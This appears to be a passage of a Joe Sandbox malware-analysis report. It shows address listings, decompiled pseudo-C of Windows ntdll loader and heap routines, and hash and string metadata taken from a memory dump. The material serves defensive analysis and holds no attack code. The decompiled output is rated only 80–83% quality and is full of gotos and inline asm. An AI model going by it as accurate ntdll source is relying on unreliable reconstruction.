                                          0x010c9a7c
                                          0x010c9a7f
                                          0x010c9a7f
                                          0x010c9a82
                                          0x010c9a84
                                          0x010c9a87
                                          0x010c9a8a
                                          0x010c9a8d
                                          0x010c9a8f
                                          0x0111166a
                                          0x0111166a
                                          0x0111166b
                                          0x01111674
                                          0x00000000
                                          0x01111674
                                          0x010c9a95
                                          0x010c9a97
                                          0x00000000
                                          0x00000000
                                          0x010c9aa0
                                          0x010c9aa3
                                          0x010c9aa9
                                          0x010c9aab
                                          0x010c9ad7
                                          0x010c9ad7
                                          0x010c9ada
                                          0x010c9add
                                          0x010c9adf
                                          0x010c9ae2
                                          0x010c9ae6
                                          0x010c9b22
                                          0x010c9b27
                                          0x010c9b29
                                          0x00000000
                                          0x010c9b2b
                                          0x011115be
                                          0x00000000
                                          0x011115be
                                          0x010c9b29
                                          0x010c9ae8
                                          0x010c9ae8
                                          0x010c9aeb
                                          0x010c9aee
                                          0x011115cb
                                          0x011115d2
                                          0x011115d5
                                          0x011115d7
                                          0x011115da
                                          0x011115dc
                                          0x011115dc
                                          0x011115dc
                                          0x011115da
                                          0x011115e5
                                          0x011115e9
                                          0x011115ee
                                          0x011115f1
                                          0x011115f3
                                          0x011115f9
                                          0x01111600
                                          0x01111604
                                          0x01111624
                                          0x01111629
                                          0x01111606
                                          0x0111161c
                                          0x01111621
                                          0x01111637
                                          0x0111163e
                                          0x01111643
                                          0x01111649
                                          0x0111164c
                                          0x01111650
                                          0x01111656
                                          0x0111165d
                                          0x0111165e
                                          0x0111165e
                                          0x01111650
                                          0x011115f3
                                          0x010c9af4
                                          0x010c9af7
                                          0x010c9afc
                                          0x010c9b00
                                          0x010c9b04
                                          0x010c9b08
                                          0x010c9b14
                                          0x010c99fe
                                          0x010c9a04
                                          0x010c9a07
                                          0x00000000
                                          0x010c9a29
                                          0x0111169c
                                          0x011116a0
                                          0x011116a5
                                          0x011116a9
                                          0x011116b5
                                          0x011116ba
                                          0x011116bc
                                          0x011116be
                                          0x011116c3
                                          0x011116c3
                                          0x011116bc
                                          0x011116c8
                                          0x011116cc
                                          0x0111181b
                                          0x0111181b
                                          0x0111181e
                                          0x0111181e
                                          0x01111821
                                          0x01111823
                                          0x01111826
                                          0x01111829
                                          0x0111182c
                                          0x0111182e
                                          0x01111688
                                          0x01111688
                                          0x01111689
                                          0x0111168b
                                          0x0111168c
                                          0x0111168d
                                          0x0111168f
                                          0x01111692
                                          0x00000000
                                          0x01111692
                                          0x01111834
                                          0x01111836
                                          0x00000000
                                          0x00000000
                                          0x0111183f
                                          0x01111842
                                          0x01111848
                                          0x0111184a
                                          0x01111875
                                          0x01111875
                                          0x01111878
                                          0x0111187b
                                          0x0111187d
                                          0x01111880
                                          0x01111884
                                          0x011118a7
                                          0x011118a7
                                          0x011118aa
                                          0x011118ad
                                          0x011118b6
                                          0x011118bd
                                          0x011118c0
                                          0x011118c3
                                          0x011118c5
                                          0x011118c8
                                          0x011118ca
                                          0x011118ca
                                          0x011118cd
                                          0x011118cd
                                          0x011118c8
                                          0x011118d5
                                          0x011118da
                                          0x011118df
                                          0x011118e2
                                          0x011118e5
                                          0x011118e7
                                          0x011118ee
                                          0x011118f2
                                          0x01111912
                                          0x01111917
                                          0x011118f4
                                          0x0111190a
                                          0x0111190f
                                          0x01111925
                                          0x0111192c
                                          0x01111931
                                          0x0111193a
                                          0x0111193e
                                          0x01111940
                                          0x01111947
                                          0x01111948
                                          0x01111948
                                          0x0111193e
                                          0x011118e5
                                          0x0111194f
                                          0x01111952
                                          0x01111956
                                          0x0111195d
                                          0x01111961
                                          0x0111196d
                                          0x00000000
                                          0x0111196d
                                          0x0111188a
                                          0x0111188f
                                          0x01111891
                                          0x00000000
                                          0x00000000
                                          0x0111189d
                                          0x00000000
                                          0x0111189d
                                          0x0111184c
                                          0x01111859
                                          0x01111859
                                          0x0111185c
                                          0x00000000
                                          0x00000000
                                          0x01111851
                                          0x01111853
                                          0x01111855
                                          0x01111865
                                          0x01111865
                                          0x01111866
                                          0x01111868
                                          0x01111870
                                          0x00000000
                                          0x01111870
                                          0x01111857
                                          0x01111857
                                          0x0111185e
                                          0x00000000
                                          0x011116d2
                                          0x011116d2
                                          0x011116d5
                                          0x011116d5
                                          0x011116d8
                                          0x011116da
                                          0x011116dd
                                          0x011116e0
                                          0x011116e3
                                          0x011116e5
                                          0x01111808
                                          0x01111808
                                          0x01111809
                                          0x01111812
                                          0x01111817
                                          0x01111817
                                          0x00000000
                                          0x01111817
                                          0x011116eb
                                          0x011116ed
                                          0x00000000
                                          0x00000000
                                          0x011116f6
                                          0x011116f9
                                          0x011116ff
                                          0x01111701
                                          0x0111172c
                                          0x0111172c
                                          0x0111172f
                                          0x01111732
                                          0x01111734
                                          0x01111737
                                          0x0111173b
                                          0x0111175e
                                          0x0111175e
                                          0x01111761
                                          0x01111764
                                          0x0111176d
                                          0x01111774
                                          0x01111777
                                          0x0111177a
                                          0x0111177c
                                          0x0111177f
                                          0x01111781
                                          0x01111781
                                          0x01111784
                                          0x01111784
                                          0x0111177f
                                          0x0111178c
                                          0x01111791
                                          0x01111796
                                          0x01111799
                                          0x0111179c
                                          0x0111179e
                                          0x011117a5
                                          0x011117a9
                                          0x011117c9
                                          0x011117ce
                                          0x011117ab
                                          0x011117c1
                                          0x011117c6
                                          0x011117dc
                                          0x011117e3
                                          0x011117e8
                                          0x011117ee
                                          0x011117f1
                                          0x011117f5
                                          0x011117f7
                                          0x011117fe
                                          0x011117ff
                                          0x011117ff
                                          0x011117f5
                                          0x0111179c
                                          0x00000000
                                          0x01111764
                                          0x01111741
                                          0x01111746
                                          0x01111748
                                          0x00000000
                                          0x00000000
                                          0x01111754
                                          0x00000000
                                          0x01111754
                                          0x01111703
                                          0x01111710
                                          0x01111710
                                          0x01111713
                                          0x00000000
                                          0x00000000
                                          0x01111708
                                          0x0111170a
                                          0x0111170c
                                          0x0111171c
                                          0x0111171c
                                          0x0111171d
                                          0x0111171f
                                          0x01111727
                                          0x00000000
                                          0x01111727
                                          0x0111170e
                                          0x0111170e
                                          0x01111715
                                          0x00000000
                                          0x01111715
                                          0x011116cc
                                          0x010c9a45
                                          0x010c9a45
                                          0x010c9a0e
                                          0x010c9a1c
                                          0x010c9a23
                                          0x0111167e
                                          0x0111167f
                                          0x01111681
                                          0x01111683
                                          0x01111684
                                          0x00000000
                                          0x01111684
                                          0x00000000
                                          0x010c9aad
                                          0x010c9aad
                                          0x010c9ab0
                                          0x010c9ab3
                                          0x010c9ab3
                                          0x010c9ab6
                                          0x00000000
                                          0x00000000
                                          0x010c9ab8
                                          0x010c9aba
                                          0x010c9abc
                                          0x010c9ac8
                                          0x010c9ac8
                                          0x00000000
                                          0x010c9abe
                                          0x010c9abe
                                          0x010c9ac0
                                          0x00000000
                                          0x010c9ac0
                                          0x010c9abc
                                          0x010c9ad2
                                          0x00000000
                                          0x010c9ad2
                                          0x010c9aab

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: ede404412bba9d7b7ab8a713ab4b971e6f09911b59ef1cb69e13266cf7f643aa
                                          • Instruction ID: 41b711978d280ddd2c72ab5396c188e3e2d18ee1e546618169e11ce409a1b23e
                                          • Opcode Fuzzy Hash: ede404412bba9d7b7ab8a713ab4b971e6f09911b59ef1cb69e13266cf7f643aa
                                          • Instruction Fuzzy Hash: 1922FF70600646AFEB28DF6CC484BBAFBB5EF45704F18856DE9968B346E731D881CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010B8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E010B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E010B934A() != 0) {
								_t159 = E0112A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1195780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01125510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1195780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E010B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E010B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E010B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1195c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1195c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E010C2280(_t92, 0x11986cc);
															_t94 = E01179DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E010D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1195c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E010B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1195c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1195c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E010EF380(_t136, 0x1081184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E010C2280(_t108, 0x11986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E010D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01179D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E010BFFB0(_t118, _t156, 0x11986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E010E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                          0x010b8799
                                          0x010b879d
                                          0x010b87a1
                                          0x010b87a3
                                          0x010b87a8
                                          0x010b87c3
                                          0x010b87c3
                                          0x010b87c8
                                          0x010b87d1
                                          0x010b87d4
                                          0x010b87d8
                                          0x010b87e5
                                          0x010b87ec
                                          0x01109bfe
                                          0x01109c00
                                          0x01109c02
                                          0x01109c08
                                          0x01109c0d
                                          0x01109c0f
                                          0x01109c14
                                          0x01109c2d
                                          0x01109c32
                                          0x01109c37
                                          0x01109c3a
                                          0x01109c3c
                                          0x01109c42
                                          0x01109c42
                                          0x01109c3c
                                          0x01109c02
                                          0x010b87da
                                          0x010b87df
                                          0x010b87e3
                                          0x00000000
                                          0x00000000
                                          0x010b87e3
                                          0x010b87f2
                                          0x00000000
                                          0x010b87fb
                                          0x010b87fd
                                          0x010b87fe
                                          0x010b880e
                                          0x010b880f
                                          0x010b8810
                                          0x010b8814
                                          0x010b881a
                                          0x010b881c
                                          0x010b881f
                                          0x010b8821
                                          0x010b8822
                                          0x010b8824
                                          0x010b8826
                                          0x010b882c
                                          0x010b882e
                                          0x01109c48
                                          0x01109c48
                                          0x010b8834
                                          0x010b8834
                                          0x010b8837
                                          0x00000000
                                          0x00000000
                                          0x010b8837
                                          0x010b882e
                                          0x010b883d
                                          0x010b8840
                                          0x010b8843
                                          0x010b8846
                                          0x010b8849
                                          0x010b884c
                                          0x010b884e
                                          0x010b8850
                                          0x010b8852
                                          0x010b8854
                                          0x010b8857
                                          0x010b88b4
                                          0x010b88b6
                                          0x010b88b6
                                          0x010b8859
                                          0x010b8859
                                          0x010b8859
                                          0x010b8861
                                          0x010b8866
                                          0x010b886a
                                          0x010b893d
                                          0x010b8941
                                          0x00000000
                                          0x010b8947
                                          0x010b8947
                                          0x010b894a
                                          0x010b894c
                                          0x00000000
                                          0x010b8952
                                          0x010b8955
                                          0x010b895a
                                          0x010b895d
                                          0x010b895d
                                          0x010b895f
                                          0x010b8961
                                          0x010b8961
                                          0x010b8968
                                          0x00000000
                                          0x00000000
                                          0x010b896a
                                          0x010b896b
                                          0x010b896e
                                          0x00000000
                                          0x010b8970
                                          0x010b8970
                                          0x010b8970
                                          0x010b8970
                                          0x010b8972
                                          0x010b8972
                                          0x010b8974
                                          0x00000000
                                          0x010b897a
                                          0x010b897a
                                          0x010b897d
                                          0x00000000
                                          0x010b8983
                                          0x01109c65
                                          0x01109c6d
                                          0x01109c72
                                          0x01109c75
                                          0x01109c75
                                          0x01109c82
                                          0x01109c86
                                          0x01109c87
                                          0x01109c88
                                          0x01109c89
                                          0x01109c8c
                                          0x01109c90
                                          0x01109c95
                                          0x01109c97
                                          0x01109ca0
                                          0x01109ca3
                                          0x01109ca9
                                          0x01109ca9
                                          0x00000000
                                          0x01109ca9
                                          0x01109ca3
                                          0x00000000
                                          0x01109c97
                                          0x010b897d
                                          0x00000000
                                          0x010b8974
                                          0x010b8988
                                          0x010b8992
                                          0x010b8996
                                          0x00000000
                                          0x010b8996
                                          0x010b894c
                                          0x00000000
                                          0x010b8870
                                          0x010b887b
                                          0x010b887d
                                          0x010b887f
                                          0x010b8881
                                          0x010b8884
                                          0x010b8884
                                          0x010b8886
                                          0x010b8889
                                          0x010b888c
                                          0x010b888e
                                          0x010b8891
                                          0x010b8891
                                          0x010b8898
                                          0x00000000
                                          0x00000000
                                          0x010b889a
                                          0x010b889b
                                          0x010b889e
                                          0x00000000
                                          0x00000000
                                          0x010b88a0
                                          0x010b88a8
                                          0x010b88b0
                                          0x010b88b2
                                          0x010b88d3
                                          0x010b88d5
                                          0x00000000
                                          0x010b88d7
                                          0x010b88db
                                          0x010b88dc
                                          0x010b88e0
                                          0x010b88e8
                                          0x010b88ee
                                          0x010b88f0
                                          0x010b88f3
                                          0x010b88fc
                                          0x010b8901
                                          0x010b8906
                                          0x010b890c
                                          0x010b890c
                                          0x010b890f
                                          0x010b8916
                                          0x010b8917
                                          0x010b8918
                                          0x010b8919
                                          0x010b891a
                                          0x010b891f
                                          0x010b8921
                                          0x01109c52
                                          0x01109c55
                                          0x01109c5b
                                          0x01109cac
                                          0x01109cc0
                                          0x01109cc0
                                          0x01109c55
                                          0x010b8927
                                          0x010b8927
                                          0x010b892f
                                          0x010b8933
                                          0x00000000
                                          0x010b88f5
                                          0x010b88f5
                                          0x00000000
                                          0x010b88f7
                                          0x010b88f7
                                          0x010b88fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010b88fa
                                          0x010b88f5
                                          0x010b88f3
                                          0x00000000
                                          0x010b88d5
                                          0x00000000
                                          0x010b88b2
                                          0x010b88c9
                                          0x00000000
                                          0x010b88c9
                                          0x010b887f
                                          0x010b886a
                                          0x010b8857
                                          0x010b8852
                                          0x010b88bf
                                          0x010b88bf
                                          0x010b87aa
                                          0x010b87ad
                                          0x010b87ae
                                          0x010b87b4
                                          0x010b87b5
                                          0x010b87b6
                                          0x010b87b8
                                          0x010b87bd
                                          0x010b87c1
                                          0x010b87f4
                                          0x010b87fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010b87c1
                                          0x00000000

                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01109C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01109C18
                                          • LdrpDoPostSnapWork, xrefs: 01109C1E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: 0a61d5b0d93a11ee4618f1db4b8146bfcd05f5873dfe70e9ce5e6f23245e66f6
                                          • Instruction ID: 4f6e652a3318886e91bba6484e81284becdd125fddb14ccfd9216092c606cc17
                                          • Opcode Fuzzy Hash: 0a61d5b0d93a11ee4618f1db4b8146bfcd05f5873dfe70e9ce5e6f23245e66f6
                                          • Instruction Fuzzy Hash: 2E910531A0021AEFDF59DF59D4C09FA77F9FF44314B0481AADA85AB261DB31E901CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DAC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E010DAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E010FD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1198a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E010E96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01153C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E010E96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E010AB150();
							} else {
								E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E010AB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E011614FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E010C7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01161411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E010C7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01161411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                          0x010dac85
                                          0x010dac88
                                          0x010dac8a
                                          0x010dac8d
                                          0x010dac91
                                          0x010dac99
                                          0x010dac9c
                                          0x01119f57
                                          0x01119f5b
                                          0x01119f60
                                          0x01119f60
                                          0x010daca8
                                          0x010dacae
                                          0x010dacda
                                          0x010dacde
                                          0x010dace8
                                          0x010daceb
                                          0x010dacee
                                          0x00000000
                                          0x010dacee
                                          0x010dacf6
                                          0x010dacb0
                                          0x010dacb0
                                          0x010dacbb
                                          0x010dacbd
                                          0x010dacc0
                                          0x010dacc5
                                          0x010dadae
                                          0x010dadb4
                                          0x010dadb4
                                          0x010dacd4
                                          0x010dacd8
                                          0x010dacf9
                                          0x010dacff
                                          0x010dad04
                                          0x010dad08
                                          0x010dad09
                                          0x010dad10
                                          0x010dad12
                                          0x010dad18
                                          0x01119f6f
                                          0x01119f74
                                          0x01119f76
                                          0x01119f7c
                                          0x01119f84
                                          0x01119f88
                                          0x01119f89
                                          0x01119f90
                                          0x01119f90
                                          0x01119f76
                                          0x010dad1e
                                          0x010dad24
                                          0x010dad26
                                          0x0111a097
                                          0x0111a09b
                                          0x0111a0ba
                                          0x0111a0bf
                                          0x0111a09d
                                          0x0111a0b2
                                          0x0111a0b7
                                          0x0111a0c5
                                          0x0111a0c8
                                          0x0111a0cb
                                          0x0111a0d2
                                          0x00000000
                                          0x010dad2c
                                          0x010dad2c
                                          0x010dad2f
                                          0x010dad34
                                          0x010dad36
                                          0x01119f97
                                          0x01119f9a
                                          0x00000000
                                          0x00000000
                                          0x01119fa9
                                          0x010dad3e
                                          0x010dad3e
                                          0x010dad41
                                          0x01119fb3
                                          0x01119fb9
                                          0x01119fc0
                                          0x01119fd0
                                          0x01119fd0
                                          0x01119fc0
                                          0x010dad4a
                                          0x010dad50
                                          0x010dad5c
                                          0x010dad62
                                          0x010dad68
                                          0x010dad6b
                                          0x010dad6d
                                          0x01119fda
                                          0x01119fdd
                                          0x00000000
                                          0x00000000
                                          0x01119fec
                                          0x00000000
                                          0x010dad73
                                          0x010dad73
                                          0x010dad73
                                          0x010dad75
                                          0x010dad75
                                          0x010dad78
                                          0x01119ff6
                                          0x01119ffc
                                          0x0111a003
                                          0x0111a00e
                                          0x0111a010
                                          0x0111a01b
                                          0x0111a01b
                                          0x0111a01b
                                          0x0111a038
